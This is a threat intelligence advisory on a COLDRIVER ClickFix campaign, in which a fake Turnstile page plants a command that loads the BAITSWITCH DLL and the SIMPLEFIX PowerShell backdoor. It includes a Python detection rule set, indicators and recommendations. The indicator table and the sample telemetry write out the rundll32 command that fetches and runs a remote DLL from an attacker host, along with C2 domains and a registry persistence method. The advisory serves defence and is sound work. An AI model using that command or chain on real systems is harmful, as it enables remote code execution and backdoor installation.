ClickFix COLDRIVER’s Fake Turnstile Lure Delivers BAITSWITCH and SIMPLEFIX
October 8th, 2025
High

Our Cyber Threat Intelligence Unit is monitoring an ongoing ClickFix social engineering campaign linked to the Russia-associated APT COLDRIVER (also known as Star Blizzard / Callisto / UNC4057). In September 2025, researchers identified a multi-stage infection chain that uses a fake Cloudflare Turnstile UI to trick users into pasting a malicious command that the page has silently placed on their clipboard. Running this command loads a malicious DLL, Machinerie.dll, which Zscaler tracks as BAITSWITCH. The DLL downloads and runs a PowerShell backdoor named SIMPLEFIX. The operators apply environmental filtering so that payloads are delivered only to selected targets, focusing on civil society organizations, journalists, think tanks, and advocacy groups, particularly those working on human rights and democracy.
Technical Details
Attack Type: Social engineering (ClickFix), remote code execution via rundll32.exe, multi-stage downloader + PowerShell backdoor.
Severity: High
Delivery Method: Victims visit a lure page mimicking a legitimate resource. The site displays a fake Cloudflare Turnstile "verification" widget whose JavaScript writes a rundll32.exe \\<UNC>\machinerie.dll,verifyme command to the clipboard and instructs the user to open the Windows Run dialog (Win+R), paste, and press Enter. No exploit is involved; the user performs the execution step.
Execution Chain:
rundll32.exe loads Machinerie.dll (BAITSWITCH) from the UNC path and calls its verifyme export → the DLL performs environment checks.
BAITSWITCH fetches tasking from captchanom[.]top and related C2 domains; the server answers with HTTP 404 when the request's User-Agent does not match the expected value, so only intended victims receive payloads.
Responses carry AES-encrypted payload blobs and commands that set up registry-based persistence.
BAITSWITCH writes an AES-encrypted PowerShell script to the registry and drops %APPDATA%\Microsoft\Windows\FvFLcsr23.ps1.
Persistence is configured through the UserInitMprLogonScript registry value → the PowerShell stager runs at each interactive logon.
The PowerShell stager decrypts and launches the SIMPLEFIX backdoor, which provides command execution and C2 communications.

Impact
Systems on which the clipboard command is executed receive a downloader that establishes registry-based persistence and installs a PowerShell backdoor.
Compromised hosts can be used for credential theft and data exfiltration, or serve as footholds for follow-on operations.
The combination of rundll32.exe, a remotely loaded DLL and registry-stored payloads leaves few on-disk artifacts, which delays detection.
Selective payload delivery and the use of legitimate hosting (e.g., Google Drive decoys) limit the value of static URL blocklists.
Detection Method
Monitor Run-dialog activity: Windows records Run-dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so hunt those values for rundll32.exe \\<UNC>\… strings, and alert on rundll32.exe spawned by explorer.exe with a UNC path on its command line (the parent/child relationship a Run-dialog launch produces).
Detect rundll32.exe loading DLLs from remote UNC paths, and in particular calls to the verifyme export. Because outbound SMB (TCP 445) is usually blocked at the perimeter, a UNC path pointing at an Internet host is typically resolved over WebDAV via the WebClient service, so WebClient activity from a workstation that does not normally use it is a useful secondary signal.
Watch for writes to HKCU\Environment\UserInitMprLogonScript (Sysmon Event ID 13 if deployed) and for creation of %APPDATA%\Microsoft\Windows\*.ps1.
Inspect outbound HTTP(S) and DNS to the known C2 domains: captchanom[.]top, southprovesolutions[.]com, preentootmist[.]org, blintepeeste[.]org.
Enable PowerShell Script Block logging (Event ID 4104) and ensure an AMSI-integrated endpoint product is active, so that in-memory decryption of the AES blobs and access to the registry artifacts (EnthusiastMode, QatItems value names) are captured.
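The detection logic above, expressed as a small rule set run over constructed endpoint telemetry. This is an added example, not code from the original advisory or from any vendor's product: the record layout (ProcessCreate, RegistryValueSet, FileCreate, DnsQuery with Sysmon-style field names) and all sample records are assumptions constructed for the example, and the domains come from the Indicators of Compromise section below with the defanging brackets removed.

```python
"""Rule set for the BAITSWITCH / SIMPLEFIX execution chain.

Added example (not part of the original advisory). Telemetry records are
constructed dicts using Sysmon-style field names; this layout is an
assumption of the example, not a real product schema.
"""
import re
from typing import Dict, List

# Domains listed in the Indicators of Compromise section (defanging removed).
C2_DOMAINS = {
    "captchanom.top",
    "southprovesolutions.com",
    "preentootmist.org",
    "blintepeeste.org",
}

# rundll32 launched with a UNC path to a DLL and an optional ",export" suffix.
RUNDLL32_UNC = re.compile(
    r"rundll32(\.exe)?\s+\\\\[^\\\s]+\\[^\s,]+\.dll(\s*,\s*(?P<export>\w+))?",
    re.IGNORECASE,
)
# Logon-script persistence value used by the campaign (per-user Environment key).
LOGON_SCRIPT_VALUE = re.compile(r"\\Environment\\UserInitMprLogonScript$", re.IGNORECASE)
# A .ps1 dropped directly into %APPDATA%\Microsoft\Windows (%APPDATA% = ...\AppData\Roaming).
APPDATA_PS1 = re.compile(r"\\AppData\\Roaming\\Microsoft\\Windows\\[^\\]+\.ps1$", re.IGNORECASE)


def classify(event: Dict[str, object]) -> List[str]:
    """Return the names of every detection that fires for one telemetry record."""
    hits: List[str] = []
    kind = event.get("type")
    if kind == "ProcessCreate":
        m = RUNDLL32_UNC.search(str(event.get("CommandLine", "")))
        if m:
            hits.append("rundll32_unc_dll")
            if (m.group("export") or "").lower() == "verifyme":
                hits.append("baitswitch_verifyme_export")
    elif kind == "RegistryValueSet":
        if LOGON_SCRIPT_VALUE.search(str(event.get("TargetObject", ""))):
            hits.append("userinitmprlogonscript_persistence")
    elif kind == "FileCreate":
        if APPDATA_PS1.search(str(event.get("TargetFilename", ""))):
            hits.append("appdata_ps1_drop")
    elif kind == "DnsQuery":
        q = str(event.get("QueryName", "")).lower().rstrip(".")
        # Match the apex domain and any subdomain of it.
        if any(q == d or q.endswith("." + d) for d in C2_DOMAINS):
            hits.append("known_c2_domain")
    return hits


def hunt(events) -> Dict[str, List[int]]:
    """Run every record through classify(); map detection name -> record ids."""
    findings: Dict[str, List[int]] = {}
    for ev in events:
        for name in classify(ev):
            findings.setdefault(name, []).append(ev["id"])
    return findings


# Constructed sample telemetry: benign noise plus one host reproducing the chain.
SAMPLE_EVENTS = [
    {"id": 1, "type": "ProcessCreate", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},  # benign local DLL
    {"id": 2, "type": "ProcessCreate", "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",  # Run-dialog launch
     "CommandLine": r"rundll32.exe \\captchanom.top\check\machinerie.dll,verifyme"},
    {"id": 3, "type": "DnsQuery", "QueryName": "captchanom.top"},
    {"id": 4, "type": "RegistryValueSet",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Environment\UserInitMprLogonScript"},
    {"id": 5, "type": "FileCreate",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\FvFLcsr23.ps1"},
    {"id": 6, "type": "DnsQuery", "QueryName": "update.microsoft.com"},
    {"id": 7, "type": "FileCreate",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Themes\x.png"},
]

if __name__ == "__main__":
    for name, ids in sorted(hunt(SAMPLE_EVENTS).items()):
        print(f"{name}: events {ids}")
```

The rundll32 rule deliberately keys on the UNC shape rather than on the specific domain, so it survives infrastructure rotation; the domain rule is the narrow, high-confidence complement. Record 1 shows why a bare "rundll32.exe" match is too noisy: Control Panel applets and many installers use it with local DLLs.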
Indicators of Compromise
Type | Indicator | Description |
UNC path / command | rundll32.exe \\captchanom[.]top\check\machinerie.dll,verifyme | Clipboard command planted by the lure; initial execution vector. |
DLL component | Machinerie.dll (BAITSWITCH) | Downloader DLL executed via rundll32.exe. |
Domain | captchanom[.]top, southprovesolutions[.]com, preentootmist[.]org, blintepeeste[.]org | C2 and payload-hosting domains serving commands and payloads. |
File | %APPDATA%\Microsoft\Windows\FvFLcsr23.ps1 | PowerShell stager drop path used for persistence. |
URL | hxxps://preentootmist[.]org/?uinfo_message=Resilient_Voices, hxxps://blintepeeste[.]org/?u_storages=Resilient_Voices_concept, hxxps://captchanom[.]top/check/machinerie.dll, hxxps://captchanom[.]top/coup/premier, hxxps://captchanom[.]top/coup/deuxieme, hxxps://captchanom[.]top/coup/troisieme, hxxps://captchanom[.]top/coup/quatre, hxxps://southprovesolutions[.]com/FvFLcsr23, hxxps://southprovesolutions[.]com/Zxdf, hxxps://southprovesolutions[.]com/KZouoRc, hxxps://southprovesolutions[.]com/EPAWl, hxxps://southprovesolutions[.]com/VUkXugsYgu | ClickFix phishing pages, BAITSWITCH DLL host and payload-staging URLs. |
Hash (SHA-256) | 62ab5a28801d2d7d607e591b7b2a1e9ae0bfc83f9ceda8a998e5e397b58623a0 | FvFLcsr23.ps1 (PowerShell stager). |
Email account | narnobudaeva@gmail[.]com | Attacker-controlled Google Drive account used to host decoy documents. |

Recommendations
Block and monitor the C2 domains (captchanom[.]top, southprovesolutions[.]com, preentootmist[.]org, blintepeeste[.]org) at the firewall and DNS layers.
Hunt for rundll32.exe \\<UNC>\… command lines in endpoint telemetry and in RunMRU history; quarantine affected hosts.
Enable PowerShell Script Block and Module logging, keep an AMSI-integrated endpoint product active, and centralize the logs for correlation.
Monitor registry writes to HKCU\Environment\UserInitMprLogonScript and the creation of new PowerShell scripts under %APPDATA%.
Educate users about ClickFix lures and reinforce that no legitimate verification step ever requires pasting a command into the Run dialog.
If BAITSWITCH or SIMPLEFIX activity is found, isolate the host, capture memory and the relevant registry hives before remediation, then remove the persistence and rotate any credentials used on the host.
Conclusion
The COLDRIVER ClickFix campaign demonstrates how a simple GUI trick can still yield reliable execution in targeted environments. By abusing the clipboard → Run workflow and a legitimate Windows binary, the actors sidestep email filtering entirely and leave minimal disk artifacts. We urge organizations to combine user education with technical controls: Run-dialog and RunMRU monitoring, PowerShell logging, restrictions on rundll32.exe loading DLLs from UNC paths, and network blocking of the listed C2 domains. We also recommend actively threat-hunting for the registry and file artifacts listed in the Indicators of Compromise section above.